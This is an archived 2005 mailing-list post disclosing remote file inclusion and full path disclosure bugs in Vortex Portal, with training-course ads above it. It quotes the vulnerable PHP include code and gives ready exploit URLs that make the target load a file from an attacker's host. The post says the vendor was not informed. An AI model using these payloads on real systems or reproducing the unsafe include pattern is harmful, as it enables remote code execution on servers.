Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Vortex Portal

Subject: Vortex Portal
Date: 23 Mar 2005 12:23:43 -0000


Vortex Portal Multiples Bugs

Vendor: http://www.VortexPortal.net
Contact: Brian Price                                                     Email: 
VGChatter@shaw.ca

I. Remote File Inclusion:

content.php -->

...
if (!isset($act)) {
        require_once("main.php");
} else {
        require_once("$act.php");
...
?>

index.php -->
...
require_once($root_dir."/content.php");
...

Exploits
 http://[target-host]/index.php?act=http://[host]/file
 http://[target-host]/content.php?act=http://[host]/file

II. Full Path Disclosure
 http://[target-host]/content.php?act=something-wrong
 and we've get :

 Warning: main(something-wrond.php): failed to open stream: No such file or 
directory in /home/*/content.php on line 9

 Fatal error: main(): Failed opening required 'something-wrond.php' 
(include_path='.:/usr/local/lib/php:/usr/lib/php:../:../') in 
/home/*/content.php on line 9

Ps.: the vendor wasn't informed.

[ Infektion Group ]
 by Dominus_Vis

<Prev in Thread] Current Thread [Next in Thread>
  • Vortex Portal, Francisco Alisson <=